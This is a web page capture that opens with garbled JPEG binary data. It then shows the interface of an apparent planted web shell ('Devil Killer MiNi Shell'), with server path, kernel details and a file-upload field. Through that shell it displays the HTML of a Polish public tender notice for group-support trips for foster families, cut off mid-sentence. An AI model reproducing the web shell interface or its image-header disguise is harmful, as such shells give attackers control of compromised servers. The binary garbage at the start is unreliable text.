JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250311/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250311/0013966701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wsparcie grupowe dla dzieci w pieczy zastępczej oraz dla rodziców zastępczych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie w Pile</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PCPR Piła</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570798410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piła</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-920</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">673491208</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">673491207</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pcpr.pila.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pcpr.pila.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wsparcie grupowe dla dzieci w pieczy zastępczej oraz dla rodziców zastępczych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eab0c52c-a080-49d2-a826-e1f53d5fb99e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00139667</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00045514/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wsparcie grupowe dla dzieci w pieczy zastępczej oraz dla rodzin zastępczych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Wsparcie deinstytucjonalizacji pieczy zastępczej w podregionie pilskim. Europejski Fundusz Społeczny Plus </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-eab0c52c-a080-49d2-a826-e1f53d5fb99e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie się komunikował z Wykonawcami poprzez stronę internetową https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce &#34;Centrum Pomocy&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanym dalej „RODO” Zamawiający informuje, że:<br/>• Administratorem Pani/Pana danych jest Powiatowe Centrum Pomocy Rodzinie z siedzibą w Pile przy al. Niepodległości 37, 64-920<br/>Piła;<br/>• Administrator Danych wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować poprzez e-mail: rodo@pcpr.pila.pl, pisemnie na adres siedziby Administratora oraz telefonicznie: 67 349 12 08;<br/>• Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, zwanej dalej „ustawą Pzp”, a następnie dla wypełnienia obowiązku archiwizacji dokumentów, w związku z art. 6 ust. 1<br/>lit. c RODO;<br/>• Pani/Pana dane osobowe mogą być przekazywane innym odbiorcom na podstawie przepisów prawa lub zawartych umów w oparciu o art. 74 ustawy Pzp;<br/>• Pani/Pana dane będą przechowywane przez okres niezbędny do realizacji celu, w którym zostały zebrane, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy o archiwizacji;<br/>• podanie przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, a konsekwencje ich niepodania wynikają z ustawy Pzp;<br/>• Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane;<br/>• przysługuje Pani/Panu:<br/>- prawo dostępu do swoich danych oraz otrzymania ich kopii,<br/>- prawo do sprostowania swoich danych,<br/>- prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa,<br/>- prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych.<br/>• nie przysługuje Pani/Panu:<br/>- w związku z art.17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o których mowa w art.. 20 RODO;<br/>- na podstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawa prawną przetwarzania<br/>danych jest art.6 ust.1. lit.c RODO.<br/>• Wystąpienie z żądaniem, o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>• W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o<br/>których mowa w art.15 ust.1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać<br/>od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PCPR.XII.325-6/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca realizacji zadania, którym jest dwudniowy wyjazd integracyjno-szkoleniowy<br/> w postaci warsztatów dla rodzin zastępczych i prowadzących rodzinny dom dziecka wraz z dziećmi i młodzieżą<br/> przebywającymi w pieczy zastępczej, w tym usamodzielnianych pn. „Wsparcie grupowe dla dzieci w pieczy zastępczej oraz<br/> dla rodzin zastępczych”. Celem zadania jest: <br/>• przeprowadzenie wyjazdowych warsztatów o różnej tematyce,<br/> • zmiana otoczenia i odciążenie od codziennych obowiązków,<br/> • integracja osób pełniących funkcję rodzica zastępczego i prowadzących rodzinny dom dziecka oraz dla dzieci i młodzieży<br/> przebywających w pieczy zastępczej, w tym usamodzielnianych;- działania wzmacniające kompetencje społeczne w ramach projektu pn. „Wsparcie deinstytucjonalizacji pieczy zastępczej w<br/> podregionie pilskim”. Działanie 6.15 Wsparcie rodziny i systemu pieczy zastępczej w ramach Programu Regionalnego<br/> Fundusze Europejskie dla Wielkopolski 2021 – 2027 współfinansowanego ze środków Europejskiego Funduszu<br/> Społecznego Plus.<br/> 1) Część I zadania – I turnus wyjazdowy (dwudniowy)<br/> a) „Czas wolny metodą przeciwdziałania wypaleniu zawodowemu rodzin zastępczych oraz warsztaty z przykładowymi<br/> formami i metodami spędzania czasu wolnego”<br/> b) „Wspólne spędzanie czasu metodą na pogłębianie relacji dzieci z rodziną zastępczą oraz warsztaty z przykładowymi<br/> formami i metodami spędzania czasu wolnego”.<br/> Uwagi do tematu zadań:<br/> a) „Czas wolny metodą przeciwdziałania wypaleniu zawodowemu rodzin zastępczych oraz warsztaty z przykładowymi<br/> formami i metodami spędzania czasu wolnego” (Część I zadania),- Grupa wsparcia dla rodziców zastępczych i prowadzących rodzinny dom dziecka – do 20 osób w 2025 roku;<br/> b) „Wspólne spędzanie czasu metodą na pogłębianie relacji dzieci z rodziną zastępczą oraz warsztaty z przykładowymi<br/> formami i metodami spędzania czasu wolnego” (Część I zadania),- Grupa wsparcia – do 20 osób w 2025 roku (dzieci i młodzież, w tym usamodzielniani);<br/> Szczegółowe informacje znajdują się w Rozdziale IV. III. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">60172000-4 - Wynajem autobusów i autokarów wraz z kierowcą</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami<br/> oceny ofert:<br/> Cena (C) - waga kryterium 100 %<br/> Sposób oceny oferty:<br/> 1. Zamawiający przystąpi do oceny złożonych ofert przy zastosowaniu podanych kryteriów wyłącznie w stosunku do ofert złożonych<br/> przez Wykonawców niepodlegających wykluczeniu oraz ofert niepodlegających odrzuceniu. <br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najniższą cenę, obliczoną wg wzoru: C = Cmin/Cb<br/> Gdzie: <br/>Cmin – najniższa cena brutto ze wszystkich cen zaproponowanych przez oferentów <br/>Cb – cena brutto oferty badanej<br/> 3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/> Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca realizacji zadania, którym jest dwudniowy wyjazd integracyjno-szkoleniowy<br/> w postaci warsztatów dla rodzin zastępczych i prowadzących rodzinny dom dziecka wraz z dziećmi i młodzieżą<br/> przebywającymi w pieczy zastępczej, w tym usamodzielnianych pn. „Wsparcie grupowe dla dzieci w pieczy zastępczej oraz<br/> dla rodzin zastępczych”. Celem zadania jest: <br/>• przeprowadzenie wyjazdowych warsztatów o różnej tematyce,<br/> • zmiana otoczenia i odciążenie od codziennych obowiązków,<br/> • integracja osób pełniących funkcję rodzica zastępczego i prowadzących rodzinny dom dziecka oraz dla dzieci i młodzieży<br/> przebywających w pieczy zastępczej, w tym usamodzielnianych;- działania wzmacniające kompetencje społeczne w ramach projektu pn. „Wsparcie deinstytucjonalizacji pieczy zastępczej w<br/> podregionie pilskim”. Działanie 6.15 Wsparcie rodziny i systemu pieczy zastępczej w ramach Programu Regionalnego<br/> Fundusze Europejskie dla Wielkopolski 2021 – 2027 współfinansowanego ze środków Europejskiego Funduszu<br/> Społecznego Plus.<br/> 2) Część II zadania – II turnus wyjazdowy (dwudniowy)<br/> a) „Trud wychowywania dziecka/nastolatka przebywającego w pieczy zastępczej – warsztaty praktyczne metody<br/> komunikacyjne dla opiekunów”;<br/> b) „Funkcjonowanie dzieci i młodzieży w pieczy zastępczej – wzmacnianie więzi rodzinnych, budowanie relacji,<br/> nawiązywanie kontaktów rówieśniczych, przełamywanie barier”.<br/> Uwagi do tematów zadań:<br/> c) „Trud wychowywania dziecka/nastolatka przebywającego w pieczy zastępczej – warsztaty praktyczne metody<br/> komunikacyjne dla opiekunów” (Część II zadania),- Grupa wsparcia dla rodziców zastępczych i prowadzących rodzinny dom dziecka – do 20 osób w 2025 roku;<br/> d) „Funkcjonowanie dzieci i młodzieży w pieczy zastępczej – wzmacnianie więzi rodzinnych, budowanie relacji,<br/> nawiązywanie kontaktów rówieśniczych, przełamywanie barier” (Część II zadania).<br/> Szczegółowe informacje znajdują się w Rozdziale IV. III. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">60172000-4 - Wynajem autobusów i autokarów wraz z kierowcą</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami<br/> oceny ofert:<br/> Cena (C) - waga kryterium 100 %<br/> Sposób oceny oferty:<br/> 1. Zamawiający przystąpi do oceny złożonych ofert przy zastosowaniu podanych kryteriów wyłącznie w stosunku do ofert złożonych<br/> przez Wykonawców niepodlegających wykluczeniu oraz ofert niepodlegających odrzuceniu. <br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najniższą cenę, obliczoną wg wzoru: C = Cmin/Cb<br/> Gdzie: <br/>Cmin – najniższa cena brutto ze wszystkich cen zaproponowanych przez oferentów <br/>Cb – cena brutto oferty badanej<br/> 3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/> Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca realizacji zadania, którym jest dwudniowy wyjazd integracyjno-szkoleniowy<br/> w postaci warsztatów dla rodzin zastępczych i prowadzących rodzinny dom dziecka wraz z dziećmi i młodzieżą<br/> przebywającymi w pieczy zastępczej, w tym usamodzielnianych pn. „Wsparcie grupowe dla dzieci w pieczy zastępczej oraz<br/> dla rodzin zastępczych”. Celem zadania jest: <br/>• przeprowadzenie wyjazdowych warsztatów o różnej tematyce,<br/> • zmiana otoczenia i odciążenie od codziennych obowiązków,<br/> • integracja osób pełniących funkcję rodzica zastępczego i prowadzących rodzinny dom dziecka oraz dla dzieci i młodzieży<br/> przebywających w pieczy zastępczej, w tym usamodzielnianych;- działania wzmacniające kompetencje społeczne w ramach projektu pn. „Wsparcie deinstytucjonalizacji pieczy zastępczej w<br/> podregionie pilskim”. Działanie 6.15 Wsparcie rodziny i systemu pieczy zastępczej w ramach Programu Regionalnego<br/> Fundusze Europejskie dla Wielkopolski 2021 – 2027 współfinansowanego ze środków Europejskiego Funduszu<br/> Społecznego Plus.<br/> 3) Część III zadania – III turnus wyjazdowy (dwudniowy)<br/> a) „Grupa wsparcia dla rodziców zastępczych oraz warsztaty z przykładowymi formami i metodami wsparcia”;<br/> b) &#34;Grupa wsparcia dla dzieci i młodzieży przebywającej w pieczy zastępczej oraz warsztaty z przykładowymi formami i<br/> metodami wsparcia”.<br/> Uwagi do tematów zadań:<br/> e) Grupa wsparcia dla rodziców zastępczych oraz warsztaty z przykładowymi formami i metodami wsparcia” (Część III<br/> zadania), - Grupa wsparcia dla rodziców zastępczych i prowadzących rodzinny dom dziecka – do 20 osób w 2025 roku;<br/> f) &#34;Grupa wsparcia dla dzieci i młodzieży przebywającej w pieczy zastępczej oraz warsztaty z przykładowymi formami i<br/> metodami wsparcia” (Część III zadania), - Grupa wsparcia – do 20 osób w 2025 roku (dzieci i młodzież, w tym usamodzielniani);<br/> Szczegółowe informacje znajdują się w Rozdziale IV. III. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">60172000-4 - Wynajem autobusów i autokarów wraz z kierowcą</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi 